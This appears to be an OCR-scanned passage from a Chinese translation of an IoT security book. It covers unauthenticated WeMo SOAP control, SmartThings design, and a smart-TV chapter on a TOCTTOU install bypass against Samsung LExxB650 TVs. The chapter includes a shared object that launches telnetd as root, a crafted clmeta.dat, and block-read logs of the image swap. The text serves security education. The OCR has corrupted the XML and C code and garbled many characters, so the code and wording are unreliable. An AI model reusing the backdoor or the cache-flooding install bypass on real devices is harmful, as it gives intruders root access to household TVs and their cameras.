HTTP/1.1 200 OK 

CONTENT-LENGTH: 285 

CONTENT-TYPE: text/xml; charset-"utf-8" 
DATE: Mon, 20 Oct 2014 16:33:36 GMT 


EXT: 
SERVER: Unspecified, UPnP/1.0, Unspecified 
X-User-Agent: redsonic 


Xs:Envelope xmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
S:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"»«s:Body» 
«u:GetBinaryStateResponse xmlns:u-"urn:Belkin:service:basicevent:1"» 
«BinaryState»0«/BinaryState» 

«/u:GetBinaryStateResponse» 

«/s:Body» «/s:Envelope» 


二 进 制 状态 BinaryState 的 值 为 0%， 表 示 开 关 是 关闭 状态 。 如 第 3 章 所 述 ， 集 线 器 也 能 够 发 送 SetBinaryState 请 求 ， 切 换 到 打开 状态 。 


请 注意 ， 这 里 与 官方 WeMo 应 用 程序 一 样 ， 并 不 需要 提供 授权 和 身份 认证 。 为 了 与 其 他 设备 (如 WeMo 开 关 和 hue 电 灯 等 ) 进行 互 用 ，SmartThings 集 线 器 和 应 用 程序 除 
了 遵循 接 入 的 第 三 方 设备 的 协议 以 外 ， 别 无 选择 。 


SmartThings 很 少 能 对 需要 接 入 的 第 三 方 设备 制定 安全 设计 。SmartThings 在 接受 互 用 性 所 带 来 的 固有 风险 和 不 安全 性 ， 或 是 选择 不 集成 这 两 者 之 间 难 以 定夺 。 
SmartThings 似 乎 已 经 决定 走 互 用 的 路 线 ， 目 标 是 能 够 支持 广泛 的 物 联网 设备 生态 系统 (包括 第 三 方 部 分 ) ， 作 为 回报 ， 他 们 能 够 使 用 martThings 应 用 程序 和 1IDE 进 行 相应 
地 编程 。 这 种 方式 看 起 来 具有 良好 的 商业 前 景 ， 因 为 这 将 SmartThings 定 位 为 未 来 物 联网 设备 的 中 央 枢 纽 。 然 而 ， 所 暴露 出 的 风险 是 : SmartThings 决 定 互 用 的 所 有 不 安全 设 
备 带 来 的 影响 的 总 和 。 


4.3 小 结 


像 SmartThings 这 样 的 家 庭 物 联网 公司 帮助 我 们 推进 了 数字 化 进程 ， 模 糊 了 物理 空间 和 在 线 虚 拟 空间 的 界限 。SmartThings IDE 是 一 种 强 有 力 的 方式 ， 能 够 在 这 些 空间 中 
优雅 地 编程 ， 从 我 们 的 家 庭 物 联网 设备 中 获得 最 大 限度 的 利益 。 


在 大 多 数 流行 的 实例 中 ， 如 在 午夜 ， 大 门 打开 或 者 运动 传感器 探测 到 活动 ， 显 然 是 符合 保护 我 们 的 安全 的 。 在 这 些 情况 下 ， 我 们 的 人 身 安 全 成 为 最 关心 的 一 个 问题 ， 技 术 
支撑 和 安全 设计 就 变 得 极为 重要 了 。 本 章 我 们 讨论 了 为 什么 smartThings 提 供 的 那些 产品 需要 使 用 远 远 超越 用 户 名 和 密码 的 传统 的 认证 方法 。 我 们 已 经 艰难 地 学 到 了 为 什么 仅 
仅 依赖 密码 保护 我 们 的 线 上 账户 安全 是 不 够 的 ， 我 们 不 能 冒险 对 确保 我 们 人 身 安 全 的 设备 做 同样 的 事 。 


关于 物 联网 设备 受 欢 迎 的 观点 表明 : 物 联网 设备 有 能 力 发 送 安全 补丁 去 修复 已 知 的 安全 漏洞 。 安 全 研究 人 员 已 经 指出 : SmartThings 集 线 器 的 主要 弱点 是 能 够 导致 中 间 人 
攻击 ， 这 已 被 SmartThings 修 补 。 这 是 一 个 好 的 例子 ， 物 联网 设备 制造 商 做 正确 的 事情 ， 通 过 联合 安全 研究 人 员 和 努力 发 行 固件 升级 为 他 们 的 客户 修补 已 经 确认 的 安全 问题 。 


我 们 也 研究 了 强大 的 SmartThings 开 发 者 IDE 如 何 能 够 与 传统 技术 结合 ， 例 如 文本 信息 ， 也 研究 了 这 些 是 如 何 被 恶意 使 用 的 ， 如 给 客户 发 送 恶 搞 短 信 ， 吓 距 客 户 或 转移 客 
户 的 注意 力 。 在 家 中 启用 更 多 的 物 联网 传感器 时 ， 我 们 应 该 考虑 所有 不 同 的 通知 和 通信 途径 ， 并 设置 策略 逐渐 将 消息 文本 这 样 的 传统 的 通讯 机 制 取 消 。 这 种 方法 可 能 比 我 们 想 
要 的 更 加 平缓 ， 在 一 些 领域 给 出 了 零星 的 数据 。 然 而 ， 重 要 的 是 ， 现 在 我 们 已 经 针对 当前 的 不 足 开始 讨论 并 指导 用 户 使 用 。 


不 像 Philips hue 电 灯 系统 和 WeMo 产 品 套件 ，SmartThings 集 线 器 和 设备 不 能 直接 相连 。 相 反 ， 它 们 连接 到 外 部 的 云 基础 设施 和 交换 设备 上 。 因 此 ， 由 于 没有 绝对 相信 
局 域 设备 ， 在 同一 个 局 域 网 中 ，SmartThings 架 构 很 少 沦 为 不 良 设备 的 受害 者 。 


考虑 到 成 功 钓鱼 尝试 的 频率 以 及 由 于 恶意 软件 导致 的 工作 站 受 侵害 的 频率 ， 这 是 一 个 受 欢 迎 的 设计 决策 ， 因 为 这 使 SmartThings 设 备 远离 同一 网 络 中 其 他 被 感染 机 器 的 折 
磨 。 然 而 ，SmartThings 方 法 不 是 以 安全 为 目的 设计 的 ， 而 更 多 的 是 以 副产品 形式 鉴于 云 平台 的 可 靠 性 作为 进入 市 场 的 第 一 步 。 


SmartThings 公 司 决定 为 了 我 们 的 平台 支持 “以 云 为 先 ”的 方法 。 这 意味 着 在 我 们 初始 发 行 版 本 中 ， 就 有 云 的 可 靠 性 。 到 现在 为 止 的 所 有 工作 ， 智 能 应 用 程序 所 有 的 工作 
都 运行 在 smartThings 云 上 ， 集 线 器 无 需 在 线 连接 到 我 们 的 云 。 通 常情 况 是 这 样 的 ， 甚 至 当 我 们 应 用 本 地 集线器 功能 时 ， 如 下 所 述 : 


我 们 相信 在 hub 系 统 中 的 本 地 功能 “连接 ”服务 ， 意 味 着 提高 性 能 并 将 用 户 从 间 催 性 的 网 络 中 断 中 脱离 出 来 。 我 们 没有 计划 支持 一 个 永远 断 开 的 模式 。 
在 首发 版 本 中 ， 我 们 决定 限制 SmartApps 连 接 到 云端 ， 因 为 这 使 我 们 更 专注 于 编写 程序 的 经 验 ， 少 一 些 针 对 hub 系 统 的 局 部 逻辑 部 署 机 制 。 
这 就 是 说 ， 我 们 在 积极 考虑 实施 方案 ， 因 此 能 够 通过 执行 本 地 智能 应 用 程序 来 发 布 到 SmartThings 集 线 器 。 


在 所 有 情况 中 ， 我 们 意识 到 关键 问题 是 : SmartThings 云 平台 在 缺失 通信 的 地 方 具有 关键 性 影响 ， 可 能 会 对 关键 、 本 地 使 用 情况 有 降低 的 影响 ， 我 们 正在 努力 思考 如 何 将 破 
坏 的 风险 降 到 最 低 。 


我 们 希望 SmartThings 和 其 他 有 影响 力 的 物 联网 设备 制造 商 继续 努力 设计 安全 的 本 地 功能 和 断 开 功能 。 他 们 对 关键 问题 的 风险 识别 产生 的 通信 损失 是 值得 称赞 的 ， 他 们 采 


取 了 正确 的 方法 。 然 而 ， 在 前 面 的 章节 中 我 们 已 经 看 到 ， 依 赖 局 域 网 的 固有 安全 会 导致 高 频率 的 破坏 ， 以 及 威胁 我 们 的 隐私 和 安全 。 展 望 未 来 ， 我 们 应 该 要 求 安全 设计 作为 一 
个 目标 而 不 是 副产品 。 如 果 设计 结构 在 连接 中 断 的 时 候 支持 关键 功能 ， 而 在 可 获得 通信 的 时 候 容易 遭受 攻击 ， 我 们 将 感到 羞愧 。 


SmartThings 这 样 的 公司 引领 了 革新 ， 帮 助 我 们 使 物 联网 引入 干 家 万 户 。 为 了 我 们 的 幸福 和 安全 ， 我 们 也 会 更 加 依赖 这 些 设 备 。 物 联网 设备 制造 商 和 消费 者 应 仔细 思考 安 
全 认证 、 通 信 可 靠 以 及 设备 间 的 安全 互 用 性 问题 。 


第 5 章 ”傻瓜 盒子 一 一 攻击 “智能 ”电视 


现在 到 处 都 是 令 人 厌烦 的 玻璃 板 ， 似 乎 要 把 我 们 与 社会 的 其 他 事物 隔离 开 来 。 我 们 果 着 手机 屏幕 ， 给 远方 的 人 发 短信 ， 却 忽视 了 和 身边 的 朋友 寒 院 。 不 可 否认 ， 第 一 世界 
国家 社会 已 经 注意 到 智能 手机 的 玻璃 显示 屏 使 我 们 的 交往 变 得 无 情 ， 没 有 了 亲和力 。 我 们 注意 到 : 它们 已 经 对 我 们 的 行为 ， 以 及 人 与 人 之 间 的 尊重 产生 了 负面 的 影响 。 在 开 
会 、 与 人 约会 ， 以 及 重要 会 谈 时 ， 越 来 越 无 法 接受 低头 玩 手机 了 。 然 而 ， 人 与 人 之 间 互 动 似乎 一 去 不 复 返 了 。 在 坐 电梯 ， 或 去 附近 的 酒吧 时 ， 注 意 观 察 周围 的 人 ， 看 看 有 多 少 
人 低 着 脑袋 目不转睛 地 盯 着 智能 手机 屏幕 。 和 陌生 人 进行 一 次 意味 深长 的 对 话 是 非常 浪漫 的 事情 ， 现 在 似乎 已 经 不 会 再 发 生 了 。 


玻璃 显示 器 早已 经 开始 影响 我 们 的 社会 ， 影 响 我 们 的 人 际 交往 了 ， 智 能 手机 只 不 过 是 最 新 的 一 个 场景 而 已 。 稍 后 我 们 再 来 讨论 这 些 设备 ， 现 在 我 们 来 看 看 对 我 们 影响 最 
大 ， 分 散 我 们 注意 力 最 厉害 的 显示 器 一 一 电视 。 电 视 机 ， 绰 号 “ 轧 人 的 盒子 。 (idiot box) ， 深 刻 影响 了 过 去 的 几 十 年 里 社会 的 技术 塑造 。 从 它 的 绰号 就 能 看 出 来 ， 它 普 } 
遭 人 地 视 。 如 果 你 在 鸡尾酒 会 上 尝试 跟 人 谈论 最 近 的 电视 节目 ， 很 快 就 会 发 现 别人 对 你 的 话题 一 无 所 知 ， 因 为 他 们 根本 就 没有 电视 ， 而 且 对 这 一 点 也 非常 自豪 。 这 种 茂 视 是 对 
的 。 现 在 ， 家 长 用 电视 来 转移 孩子 的 注意 力 ， 让 孩子 变 得 越 来 越 思 钝 ， 这 样 的 例子 不 胜 枚 举 。 孩 子 看 电视 就 是 浪费 时 间 ， 应 该 把 时 间 花 在 更 有 创造 性 的 事情 上 ， 或 者 多 跟 父母 
在 一 起 ， 这 一 点 没 人 会 反 驶 。 也 可 以 想象 一 下 ， 即 使 是 一 个 成 年 人 采 着 电视 几 个 小 时 看 些 没 头 没 脑 的 节目 ， 也 会 被 误导 ， 甚 至 陷入 那些 肤浅 的 大 众 娱乐 节目 当中 去 。 


虽然 我 们 批判 电视 ， 但 是 它 还 是 有 很 多 优点 的 。 除 了 娱乐 大 众 之 外 ， 这 个 星球 上 的 人 依靠 电视 获取 信息 ， 增 进 对 周围 世界 的 了 解 。 通 过 电视 ， 我 们 听 到 了 一 些 不 同 的 观 
点 ， 看 到 了 辩论 赛 和 纪录 片 ， 这 些 是 真正 的 教育 。 电 视 还 为 我 们 分 享 了 世界 性 的 事件 。 生 活 在 1969 年 ?月 的 人 ， 你 问 他 们 什么 事情 有 着 深远 的 意义 ， 他 们 会 告诉 你 是 观看 阿波 
罗 11 号 飞船 所 完成 的 人 类 首次 登录 月 球 的 电视 转播 。 大 约 6 亿 人 观看 了 尼 尔 :阿姆斯特朗 和 巴 兹 - 奥 尔 德 林 在 月 球 表面 行走 的 画面 ， 展 示 了 人 类 技术 的 伟大 胜利 。 美 国 及 全 世界 都 
看 到 了 登 月 直播 ， 向 全 社会 展示 了 合作 精神 ， 让 我 们 体验 到 了 即使 是 我 们 最 近 的 邻居 月 球 ， 和 我 们 也 相隔 万 里 。 对 比 这 些 ， 我 们 人 类 是 多 么 的 渺小 ， 而 登 上 月 球 又 是 一 件 多 么 
了 不 起 的 事情 。 虽 然 美国 主导 了 登 月 任务 ， 世 人 都 看 呆 了 ， 但 最 后 功劳 还 是 归功 于 全 人 类 。 


电视 带 给 我 们 的 直播 报道 永远 改变 了 我 们 的 生活 ， 影 响 了 我 们 的 观点 。2001 年 9 月 11 日 的 恐怖 袭击 事件 给 全 世界 人 都 带 来 了 丽 惧 ， 几 乎 在 每 一 个 观看 了 了 恐怖 分 子 劫机 撞 向 
世贸 大 楼 ， 无 辜 受 害 者 跳出 窗户 ， 大 楼 裔 塌 录 像 剪 辑 的 人 心灵 上 刻下 了 无 法 磨灭 的 伤疤 。 


无 论 从 哪个 角度 来 看 电视 积累 下 来 的 贡献 ， 这 个 设备 都 不 会 很 快 消失 。 全 世界 数 十 亿 家 庭 拥有 电视 ， 观 看 定期 播放 的 电视 节目 。 最 近 ， 我 们 看 到 电视 在 屏幕 尺 十 和 分 辩 率 
上 有 了 很 大 的 改进 ， 画 面 质量 更 加 清晰 向 真 。 高 分 辨 率 电视 提供 的 分 辨 率 可 达 每 帧 2073600 个 像素 。 超 高 分 辨 率 的 接班 人 4K 和 8K 标 准 (http://bit.ly/ultra-high-def tv) 即将 
推出 ，4K 标 准 提供 4 倍 分 辨 率 ， 据 传 8K 标 准 可 提供 7680x4320 (3320 万 ) 个 像素 。 


当前 市 场 上 涌现 的 最 新 一 波 “ 智 能 ”电视 ， 关 注 的 不 仅仅 是 分 辩 率 的 改进 。 这 些 设备 接 入 到 我 们 的 Wiri 网 络 中 为 我 们 提供 服务 ， 这 在 以 前 是 根本 想象 不 到 的 。 这 些 电视 包 
括 了 观看 视频 流 、 视 频 会 议 、 社 交 网 络 和 即时 信息 等 服务 。 在 物 联 网 领域 ， 我 们 传统 理解 的 电视 作为 “ 物 ” 正 在 演变 为 一 个 显示 器 ， 除 了 显示 常规 内 容 之 外 ， 还 提供 各 种 新 式 
服务 。 


由 于 智能 电视 增加 了 新 的 服务 ， 使 得 它 在 家 庭 事务 中 越 来 越 受 欢迎 。 最 新 一 代 智能 电视 非常 贵 ， 只 适用 于 比较 富裕 的 家 庭 。 然 而 ， 考 虑 到 技术 廉价 化 常规 规律 ， 智 能 电视 
新 的 特性 集 很 快 就 会 遍布 干 家 万 户 。 下 一 个 全 世界 欢 庆 或 全 世界 心 碎 的 事件 可 能 就 是 通过 智能 电视 直播 给 亿 万 观众 的 。 


如 果 智能 电视 进入 到 了 我 们 WiFi 网 络 ， 网 络 中 还 有 其 他 很 多 重要 的 计算 机 和 物 联网 设备 ， 那 么 评估 当前 市 场 上 智能 电视 设备 设计 的 安全 性 就 变 得 非常 重要 了 。 本 章 , 我 们 
来 看 一 下 针对 智能 电视 的 实际 研究 中 的 攻击 向 量 ， 理 解 如 何 改进 设计 ， 确 保 以 不 同方 式 使 用 这 些 设备 的 物 联网 的 安全 性 。 


5.1 TOCTTOU 攻 击 


很 多 流行 的 智能 电视 ， 运 行 的 都 是 Linux 操 作 系统 ， 特 别 是 三 星 生产 的 智能 电视 。 它 们 与 桌面 电脑 和 笔记 本 电脑 的 设计 在 本 质 上 非常 相似 ， 仪 仅 是 在 界面 设计 上 咯 有 不 
同 ， 智 能 电视 的 用 户 界 面 是 专 为 显示 各 种 不 同 来 源 的 视频 内 容 而 定制 的 。 智 能 电视 使 用 Linux 这 么 强大 的 操作 系统 ， 可 以 运行 很 多 不 同 的 应 用 程序 ， 如 Skype 和 浏览 器 程序 。 
接 下 来 ， 本 章 将 带领 读者 看 看 它 的 基础 架构 的 详细 内 容 ， 分 析 一 些 广为人知 面向 智能 电视 的 攻击 方法 。 我 们 先 来 看 一 个 最 基础 的 攻击 向 量 ， 叫 作文 件 静 态 访问 攻击 (Time-of- 
Check-to-Time-of-Use, TOCTTOU) ， 这 个 攻击 方法 最 早 是 由 Collin Mulliner 和 Benjamin Michéle 两 位 研究 人 员 公 布 的 。 


TOCTTOU 攻 击 是 针对 消费 类 电子 产品 最 主要 的 一 项 基础 安全 功能 : 确保 设备 软件 的 更 新 是 合法 的 ， 且 它 是 由 设备 厂商 或 可 信 的 第 三 方 社团 开发 的 。 这 一 功能 使 得 制造 商 
可 以 保护 其 知识 产权 并 打击 恶意 软件 ， 避 免 恶意 软件 破坏 设备 软件 的 完整 性 ， 泄 露 消费 者 隐私 。 有 关 这 一 点 最 好 的 一 个 例子 就 是 针对 安装 在 iPhone 和 iPad 上 的 苹果 iOSs 操 作 系 
统 的 越狱 社区 。 苹 果 公司 不 断 创建 一 些 新 的 安全 机 制 ， 以 防止 其 他 人 更 改 设备 的 核心 功能 ， 保 护 用户 体 验 的 所 有 权 ， 保 障 设备 免 遭 恶意 程序 的 攻击 。 从 另 一 个 角度 讲 ， 越 狱 社 
区 致力 于 发 现 苹果 安全 机 制 的 漏洞 ， 进 而 可 以 修改 设备 的 功能 ， 安 装 一 些 非 苹果 授权 为 用 户 定制 的 功能 和 软件 。 就 智能 电视 来 讨 ， 厂 商 不 希望 在 他 们 设备 上 运行 非 授权 代码 ， 
保护 他 们 的 知识 产权 ,避免 因 用 户 上 传 有 bug 的 代码 而 带 来 保修 问题 ， 保 障 类 似 于 在 线 租赁 电影 这 类 的 数字 内 容 不 被 非法 复制 。 从 另 一 个 角度 讲 ， 智 能 电视 的 用 户 希 望 冲破 厂 
商 强 加 的 安全 机 制 ， 这 样 他 们 就 可 以 对 设备 进行 微调 ， 在 不 需要 厂商 技术 支持 的 条 件 下 自行 解决 设备 的 一 些 问题 ,或 者 是 盗窃 基于 租赁 的 媒体 内 容 ， 将 其 复制 刻录 下 来 。 


5.1.1 ”三星 LExxB650 系 列 


Mulliner 和 Michéle 的 研究 主要 是 在 三 星 LExxB650 系 列 智能 电视 (如 图 5-1 所 示 ) 上 开展 的 ，TOCTTOU 攻 击 向 量 也 可 以 应 用 在 其 他 具有 类 似 漏洞 的 消费 类 电子 设备 上 。 


图 5-1: 三 星 LExxB650 系 列 智能 电视 


在 智能 电视 和 其 他 电子 产品 中 ，USB 端 口 一 般 用 于 读 写 包含 了 媒体 内 容 、 应 用 程序 、 软 件 更 新 等 文件 。 智 能 电视 可 以 插入 存储 设备 (如 USB 存 储 卡 ) ， 查 看 存储 卡 中 的 内 
容 ， 也 可 以 用 于 安装 智能 电视 应 用 程序 以 及 固件 升级 。 


应 用 于 三 星 LExxB650 系 列 电视 的 应 用 程序 大 体 分 为 两 类 : Adobe Flash 和 本 地 二 进 制 文件 。Mulliner 和 Michele 的 研究 主要 是 针对 本 地 二 进 制 文件 开展 的 。 这 些 二 进 制 文 
件 都 以 .so 作为 扩展 名 ， 也 就 是 说 这 些 二 进 制 文件 能 够 与 其 他 二 进 制 文件 共享 代码 ， 可 以 在 运行 时 加 载 。 这 类 二 进 制 文件 的 优势 在 于 : 其 他 模块 可 以 使 用 该 文件 提供 的 代码 和 
应 用 ， 从 而 消减 可 执行 文件 的 大 小 ， 也 允许 开发 人 员 改 变 某 个 文件 中 的 共享 代码 而 不 必 重新 编译 其 他 依赖 模块 。 三 星 电视 使 用 Linux 操 作 系 统 ， 因 而 这 种 方法 很 常见 。 在 微软 
Windows 的 世界 里 ， 这 种 文件 被 称 为 动态 链接 库 (DLL) 。 


三 星 使 用 BusyBox 系 统 ， 它 将 一 些微 型 版 本 Linux 工 具 集 成 为 一 个 单一 的 可 执行 文件 。BusyBox 系 统 对 于 强化 用 户 设备 非常 有 用 ， 因 为 它 提 供 了 一 个 包含 和 排除 命令 的 简 
单方 法 来 ， 更 加 模块 化 。 


三 星 电视 运行 一 个 名 为 exeDSP 的 二 进 制 文件 ， 该 文件 基本 控制 了 整个 系统 的 功能 。exeDSP 文 件 负 责 用 户 界面 导航 ， 人 允许 用 户 更 改 设置 和 访问 应 用 程序 。exeDSP 二 进 制 
文件 运行 于 root 用 户 权限 下 ， 即 拥有 全 部 权限 。 


运行 于 三 星 电视 上 的 应 用 程序 至 少 包 含 3 个 文件 : 可 执行 代码 (Adobe Flash 格 式 或 共享 对 象 格式 ) 、 一 个 bitmap 文 件 (作为 应 用 程序 图 标 ) 和 一 个 包 描述 文件 
clmeta.dat， 下 边 是 clImeta.dat 文 件 的 一 个 例子 : 


<?xml version-"1.0" encoding-"utf-8"?» 
Xcontentlibrary» 
«contentpackid-"tocttou"» 
«category»Wellness«/category» 
«title language id-"English"»tocttou«/title» 
«startpointlanguage id-"English"»tocttou.so«/startpoint» 
«thumbnailpath»tocttou.bmp«/thumbnailpath» 
«totalsize»1«/totalsize» 
«/contentpack» 
«/contentlibrary» 


startpoint 标 记 指定 了 二 进 制 文件 的 名 称 ， 这 里 是 tocttou.so。category 标 记 说 明了 应 用 程序 的 类 型 ， 这 里 是 Wellness。 其 他 的 三 星 设备 能 够 识别 的 类 型 包括 Game 和 
Children。Mulliner 和 Michéle 指 出 : 类 型 为 “Game” 的 应 用 程序 是 以 共享 对 象 的 形式 存在 的 ， 其 他 类 型 的 应 用 程序 都 是 典型 的 Adobe Flash 应 用 程序 。 


对 于 共享 对 象 文 件 ，exeDSP 可 执行 文件 会 调用 Game_Main 函 数 ， 该 函数 的 代码 是 用 C 编 写 的 ， 下 边 是 一 些 简单 的 共享 对 象 代码 : 


intGame Main(char *path, char *udn) 
{ 

system("telnetd&"); 

return 0; 


) 


在 这 个 例子 中 ， 应 用 程序 开启 Telnet 服 务 (假定 该 服务 已 经 安装 在 系统 上 ) 。 然 而 ，LExxB650 系 列 不 允许 安装 其 他 共享 库 应 用 程序 。 这 对 于 那些 可 以 修改 电视 功能 ,或 
者 可 以 安装 恶意 代码 以 感染 设备 (比如 ， 人 允许 攻击 者 通过 查看 电视 上 的 摄像 头 盗 取 用 户 隐私 或 偷 取 可 能 存储 于 电视 上 的 任何 认证 信息 ) 的 第 三 方 软件 来 说 ， 是 一 个 非常 苛刻 的 
限制 条 件 。Mulliner 和 Michele 研 究 的 目的 是 测试 并 证 实 是 否 存在 一 种 方法 能 够 绕 过 这 一 限制 。 


5.1.2 ”漏洞 利用 


回忆 一 下 ，exeDSP 可 执行 文件 是 通过 root 权 限 运行 的 。exeDSP 进 程 也 用 于 调用 共享 库 应 用 程序 。 由 于 exeDSP 不 能 降低 共享 库 应 用 程序 的 运行 权限 ， 因 而 ， 对 于 攻击 者 
来 讲 ， 安 装 额外 的 第 三 方 应 用 程序 就 非常 有 吸引 力 了 。 对 于 想 要 扩展 或 变更 电视 功能 的 用 户 来 讲 ， 同 样 如 此 。 因 此 ， 攻 击 者 的 目标 就 变 成 了 想 办 法 让 电视 允许 安装 外 部 Game 
类 型 的 共享 库 代 码 应 用 程序 。 


Mulliner 和 Michéle 使 用 Gumstix 扩 展板 建立 攻击 环境 。，Gumstix 板 配 有 一 个 USB OTG 端 口 ， 允 许 其 他 USB 设 备 作 为 客户 端 接 入 (例如 ，USB 存 储 卡 以 及 数字 摄像 机 ) 。 
USB OTG 也 允许 Gumstix 板 充当 客户 端 (例如 ，USB 存 储 卡 作 为 存储 设备 接 入 其 他 主机 的 USB 端 口 ) 。 


Gumstix 板 基本 上 就 是 一 个 迷你 计算 机 。 厂 商 的 说 明 书 中 有 介绍 如 何 连 接 一 个 新 的 Gumstix 板 的 内 容 ， 这 对 于 理解 Gumstix 板 的 功能 和 性 能 很 有 帮助 。 


g_file_storage.ko 模 块 是 Linux USB 栈 的 一 部 分 。 通 过 使 用 该 模块 ， 并 将 Gumstix 板 当 作 USB 存 储 设备 ， 就 可 以 分 析出 当 呈 现 一 个 应 用 程序 时 电视 需要 读 取 的 文件 是 什 
么 。 以 三 星 电视 为 例 ， 非 共享 库 应 用 程序 (如 Adobe Flash 应 用 程序 ) ， 可 从 USB 设 备 复制 到 电视 的 内 部 存储 并 执行 。 每 一 个 应 用 程序 都 应 当 有 它 自己 的 目录 ， 其 中 会 包含 
bitmap 文 件 、clemeta.dat 文 件 和 在 clImeta.dat 文 件 的 startpoint 标 记 中 列举 出 来 的 二 进 制 文件 。 


g_gile_storage.ko 使 用 一 个 文件 系统 映像 文件 名 作为 参数 输出 给 USB 设 备 。 当 接 入 一 个 主机 时 ， 每 一 个 块 请 求 都 会 被 读 出 来 然后 发 送出 去 。 研 究 人 员 修 改 了 
g_gile_storage.ko 的 功能 ， 跟 踪 每 一 个 块 读 取 请 求 ， 目 的 是 确定 : 当 呈 现 一 个 新 的 应 用 程序 时 ， 电 视 读 取 了 哪些 信息 。 下 边 是 一 个 修改 版 的 g_file_storage.ko 在 电视 呈现 一 个 
Adobe Flash 应 用 程序 时 所 输出 的 内 容 示 例 : 


:56 TOCTTOU (DIR) 

:56 CLMETA.DAT (471b) [/TOCTTOU] 
:56 CLMETA.DAT -» read completed! 
:56 CACHE (DIR) 

:56 CLMETA.DAT (450b) [/CACHE] 
:56 CLMETA.DAT -> read completed! 
:10 CACHE.BMP (843758b) [/CACHE] 
:10 CACHE .BMP -> read completed! 
:10 TOCTTOU.BMP (490734b) [/TOCTTOU] 
:10 TOCTTOU.BMP -» read completed! 
:56 TELNETD (1745016b) [/TOCTTOU] 
:56 TELNETD -> read completed! 

:56 TOCTTOU.SO (4608b) [/TOCTTOU] 
:56 TOCTTOU.SO -» read completed! 
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本 例 中 ，g _file_storage.ko 模 块 在 插入 到 三 星 电视 的 Gumstix 板 上 运行 ， 该 电视 包含 了 两 个 保存 在 各 自 目录 中 的 应 用 程序 : TOCTTOU 和 CACHE。 对 每 一 个 应 用 程序 ， 电 
视 都 会 向 clmeta.dat 文 件 发 送 请 求 (标记 的 时 间 是 11: 18: 56) 。 这 时 ， 用 户 会 看 到 可 被 安装 的 应 用 程序 的 类 型 。 我 们 假定 TOCTTOU 应 用 程序 是 Wellness 类 型 的 ， 用 户 在 远 
程 遥 控 选 择 该 类 型 的 应 用 程序 。 这 时 ，TOCTTOU 目 录 中 的 全 部 内 容 就 会 被 复制 到 电视 的 内 部 存储 中 ， 包 括 bitmap 图 像 文 件 、telnetd 二 进 制 可 执行 文件 和 TOCTTOU.SO 可 执 
行文 件 。 注 意 Game 类 型 的 应 用 程序 不 会 安装 到 电视 上 ， 因 为 外 部 代码 共享 库 程序 是 禁止 安装 的 。 


注意 clmeta.dat 文 件 只 会 读 取 一 次 (在 11: 18: 56) 。 用 户 安装 TOCTTOU 应 用 程序 ， 电 视 不 会 读 取 clmeta.dat 文 件 。 这 是 因为 电视 运行 Linux 操 作 系统 ， 而 Linux 操 作 系 
统 是 一 个 包含 了 块 缓存 功能 的 操作 系统 。 文 件 读 取 操 作 会 使 系统 运行 变 慢 ， 而 块 缓存 功能 则 通过 将 最 近 访 问 文件 操作 保存 于 电视 的 RAM 中 加 速 系统 运行 速度 ，RAM 的 读 取 速 
度 比 文件 系统 要 快 得 多 。 


TOCTTOU 攻 击 背 后 的 想法 是 : 为 电视 提供 一 个 应 用 程序 目录 ， 其 中 对 应 的 cImeta.dat 文 件 将 应 用 程序 描述 为 Wellness 类 型 。 一 旦 电视 验证 了 这 一 点 ， 用 户 就 可 以 选择 应 
用 程序 了 ， 而 且 电 视 会 将 目录 中 的 所 有 内 容 复 制 至 本 地 存储 器 中 并 执行 。 之 后 TOCTTOU 攻 击 改变 clImeta.dat 的 类 型 为 Games， 以 允许 共享 库 代 码 的 安装 。 为 了 做 到 这 一 
点 ，Mulliner 和 Michele 进 一 步 扩展 了 9 _file_storage.ko 的 功能 ， 以 便于 跟踪 文件 (触发 文件 ) 被 请 求 读 取 的 次 数 。 进 而 ，g file_storage.ko 被 扩展 为 : 当 触 发 文件 的 读 取 次 
数 达到 一 个 特定 值 (触发 次 数 ) 时 ， 就 会 切换 到 另 一 幅 图 像 。 


研究 人 员 为 攻击 创建 了 两 个 文件 系统 映像 文件 。 第 一 个 映像 文件 取 名 为 B (表示 开始 Begin) ， 包 含 两 个 应 用 程序 : TOCTTOU 和 Cache， 每 一 个 应 用 程序 都 包含 一 个 
clmeta.dat 文 件 ， 其 中 的 类 型 定义 为 Wellness， 还 包括 一 个 对 应 图 标 文件 以 及 可 执行 文件 。TOCTTOU 应 用 程序 包含 telnetd 可 执行 文件 。 第 二 个 映像 文件 取 名 为 M (表示 更 改 
Modified) ， 包 含 同样 的 文件 ， 只 是 TOCCTOU 目 录 clmeta.dat 文 件 中 将 类 型 改 成 了 Game。 


研究 人 员 将 修改 了 的 g file_storage.ko 代 码 以 U 盘 的 形式 接 入 到 电视 中 ， 运 行 B 映 像 。 当 电视 读 取 Cache 应 用 目录 中 的 clmeta.dat 文 件 时 ，g file_storage.ko 在 后 台 切 换 到 
M 上 映像 。 现 在 ， 当 用 户 选择 安装 TOCCTOU 应 用 程序 时 ，M 上 映像 中 的 文件 就 可 以 在 TV 中 运行 了 。 问 题 是 : 即使 恶意 的 M 映 像 中 包含 类 型 Game 的 clmeta.dat 文 件 ， 安 装 之 前 ， 
该 文件 是 不 会 被 读 取 的 ， 因 为 基于 块 缓存 机 制 ， 它 还 在 电视 的 内 存 中 。 研 究 人 员 通 过 改变 Cache 应 用 的 clImeta.dat 文 件 大 小 ， 使 其 大 于 260MB (通过 填充 额外 的 空间 ) 来 绕 过 
这 一 机 制 。 这 一 方法 耗 尽 了 用 于 分 配 块 缓存 的 RAM 空 间 ， 使 得 电视 不 得 不 重读 clmeta.dat 文 件 ， 这 时 clmeta.dat 文 件 定义 的 类 型 是 Game。 


这 种 攻击 方法 之 所 以 能 够 成 功 ， 是 由 于 电视 只 在 最 初 检查 clmeta.dat 文 件 的 类 型 ， 重 读 的 时 候 不 再 检查 (因而 这 种 攻击 取 名 为 文件 静态 访问 攻击 ) 。 下 边 是 使 用 这 种 攻击 
g file storage.ko 的 输出 : 


1 TOCTTOU (DIR) 


2 CLMETA.DAT (471b) [/TOCTTOU] 

3 CLMETA.DAT -> read completed! 

4 CACHE (DIR) 

5 CLMETA.DAT (272630223b) [/CACHE] 

6 CLMETA.DAT -» read completed! [device switched!] 
7 CACHE. BMP (8437585) [/CACHE] 

8 CACHE.BMP -> read completed! 

9 TOCTTOU (DIR) 


10 TOCTTOU.BMP  (490734b) [/TOCTTOU] 
11 TOCTTOU.BMP -> read completed! 
12 TELNETD (1745016b) [/TOCTTOU] 
13 TELNETD -» read completed! 
14 TOCTTOU.SO (46085) [/TOCTTOU] 
